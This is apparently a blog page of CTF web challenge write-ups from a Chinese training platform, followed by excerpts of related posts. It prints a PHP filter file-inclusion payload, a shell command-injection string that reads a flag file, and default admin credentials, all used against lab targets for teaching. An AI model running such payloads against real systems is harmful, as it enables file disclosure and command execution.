代码编织梦想

文件包含

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

首先尝试测试
在这里插入图片描述
经过尝试后发现read被ban掉了,这里参考了一下官方的wp
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*

\具体支持的编码可见php官方文档
\https://www.php.net/manual/zh/mbstring.supported-encodings.php

利用iconv进行编码

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

在这里插入图片描述

command_execution

127.0.0.1 |ls /home
在这里插入图片描述

127.0.0.1  | cat /home/flag.txt

在这里插入图片描述

weak_auth

小宁写了一个登陆验证页面,随手就设了一个密码。
账号密码admin/123456
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/127125759

攻防世界web_恋物语战场原的博客-爱代码爱编程

攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post

攻防世界web进阶之cat-爱代码爱编程

攻防世界WEB进阶之Cat 第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只猫,没任何提

攻防世界-web高手进阶篇-warmup-爱代码爱编程

打开题目链接后只有一个滑稽??(那就看看它里面有啥吧) 想啥呢,是审查源码啦 可以看到有注释source.php,访问后可以看到其源码 又发现一个hint.php文件,先访问再说 提示我们flag在ffffllllaaaagggg里面,此时题目已经完成一半啦 接着看回source.php源码 可以看到最后的include 是可以

攻防世界-WEB进阶篇(二)-爱代码爱编程

简述 好久没有更新这个XCTF的题目了,现在过来更新一下。争取今年能够入门CTF的WEB方向。 一、PHP2 从题目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可以看到提升我们网站中有fl0g.php这个文件。我们直接访问就能得到flag。 二、ba

攻防世界 web php include,攻防世界web进阶1-12总结篇-爱代码爱编程

1.baby_web 访问页面跳转到1.php,burp抓包防止跳转,flag藏在响应头里面 2.Training-WWW-Robots 爬虫协议,直接得flag 3.Web_php_unserialize var传参,需要注意三点: 1.想要访问f14g.php,就要反序列化f14g.php 2.CVE漏洞绕过__wak

攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web-爱代码爱编程

php_rce 首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478 var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参 于是构造payload http://111.198.29.45:30600

攻防世界web高手进阶php_rce,攻防世界 web高手进阶区 1-5 2020.6.11-爱代码爱编程

前言 继续ctf的旅程 攻防世界web高手进阶区的1-5题 1、baby_web 进去是个1.php 页面里只有helloworld 按题意是说想看初始网页 猜测有index.php 结果直接跳转到1.php 查看源码 在index的请求头里发现flag 2、Training-WWW-Robots 这题不就是个robots嘛

攻防世界web篇 simple_js-爱代码爱编程

昨天发现了一个非常有趣的ctf训练网站,虽然上面的题比较简单,但是感觉非常适合新手拿来练手,今天零零碎碎一天写了写web篇的内容,学习到了很多东西,看到csdn上这一篇题解不多,就发一下个人的解法。 首先分析一波 题目描述:小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )(ps:给出格式的话,很可

CTF攻防世界web初级区详解-爱代码爱编程

最近几天刚刚接触了ctf,去尝试了一下攻防世界web区的新手篇题目,以下解题过程记录一下自己的学习体会与心得,如果哪里有错可以在评论区告诉我,我及时改正。 1.view_source 1.1获取场景后: 1.2根据题目要求,我们需要查看网页源代码,打开方式一种是鼠标右键打开,一种是按F12键,题目规定无法右键,所以我们按F12打开,如图:

攻防世界(web篇)---warmup-爱代码爱编程

攻防世界—warmup 文章目录 攻防世界---warmup题目 php代码审计用到的php知识highlight_file(__FILE__)emmm::checkFile($_REQUEST['file'])mb_substrmb_strposREQUEST函数include题解打开题目,f12发现:访问hint.php条件 if中的全为tu

攻防世界 WEB easy_laravel-爱代码爱编程

这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议

【攻防世界-Web进阶篇-005unserialize3】-爱代码爱编程

解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public fun

攻防世界(web篇)---web_php_include_肖萧然的博客-爱代码爱编程

文章目录 攻防世界(web篇)---Web_php_include题目hello传值phpmyadmin写马大写绕过 PHP://inputdata://file://协议 攻防世界(web篇)—Web_php_include 题目 <?php show_source(__FILE__); echo $_GET['hello']; $

攻防世界 web篇(二)_guiltyfet的博客-爱代码爱编程

攻防世界 web篇(二) warmupfavorite_numberwarmupshrine warmup $whitelist = ["source"=>"source.php","hint"=&

攻防世界 web bilibili_bilibili攻防世界-爱代码爱编程

打开场景,我们就知道这题已经训练了两年,非常的唱跳rap啊 咱就说 hint:ikun们冲鸭,一定要买到lv6!!! 审计页面源码,发现lv几都是png图片,不妨试试lv6在哪个页面 点击下一页,url变为/shop?pag

ctf-爱代码爱编程

CTF-攻防世界web新手入门(全) 攻防世界网址1、view_source2、robots3、backup4、cookie5、disabled_button6、weak_auth7、simple_php8、g